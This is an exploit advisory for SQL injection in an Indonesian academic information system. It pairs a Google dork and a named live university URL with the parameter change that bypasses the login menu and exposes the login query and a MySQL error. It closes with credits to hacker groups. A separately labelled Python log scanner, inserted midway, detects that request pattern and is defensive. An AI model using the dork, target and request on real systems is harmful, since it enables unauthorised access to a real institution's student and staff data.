# Exploit Title: Sistem Informasi Akademik SQL Injection
# Dork: inurl:?mnux=login
# Date: 2019-01-31
# Type: Low
# Exploit Author: L4663r666h05t - RebellionGhost
# Vendor Homepage: N/A
# Tested on: Windows 10 x64
Google dork: inurl:?mnux=login, or open this page directly:
Live Target:
http://sisfo193.unisma.ac.id/?mnux=login
Change "?mnux=login" to "?mnux=loginprc&BypassMenu=1".
Output:
Gagal:
select * from
where Login=''
and LevelID = ''
and KodeID = 'UNISMA'
and NA = 'N'
and Password=LEFT(PASSWORD(''),10) limit 1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where Login='' and LevelID = '' and KodeID = 'UNISMA' and NA' at line 2
Screenshot: http://prntscr.com/meje0q
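Detection sketch for the request above, added here as an example and not part of the original advisory: it scans web server access logs for direct calls to the login processor that carry a BypassMenu parameter. It assumes Combined Log Format; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Combined Log Format prefix: ip ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_loginprc_bypass(lines):
    """Flag requests that call the login processor directly (mnux=loginprc)
    together with a BypassMenu parameter, whatever the parameter order."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed log format
        # parse_qsl percent-decodes names and values, so encoded variants match;
        # names and values are lower-cased to make the match lenient.
        params = {}
        query = urlsplit(m["target"]).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            params.setdefault(name.lower(), []).append(value.lower())
        if "loginprc" in params.get("mnux", []) and "bypassmenu" in params:
            findings.append({"line": lineno, "ip": m["ip"], "time": m["time"],
                             "method": m["method"], "status": int(m["status"])})
    return findings

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [31/Jan/2019:10:02:11 +0700] "GET /?mnux=login HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.25 - - [31/Jan/2019:10:03:40 +0700] "GET /?mnux=loginprc&BypassMenu=1 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.25 - - [31/Jan/2019:10:03:44 +0700] "GET /?BypassMenu=1&mnux=%6Cogin%70rc HTTP/1.1" 200 812 "-" "curl/7.61"',
    '198.51.100.7 - - [31/Jan/2019:10:05:02 +0700] "POST /?mnux=loginprc HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_loginprc_bypass(SAMPLE_LOG):
        print(hit)
```

A hit means the request pattern was seen; whether the failed query and MySQL error were echoed back still has to be confirmed from the response or the application's error handling.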
Thanks to: ManadoGhost - RebellionGhost - ExploiterID - Berandal - Mr.Vendetta_404 - KID2ZON3 - Vlyn - Indonesia Cyber Freedom - All Indonesian Haxor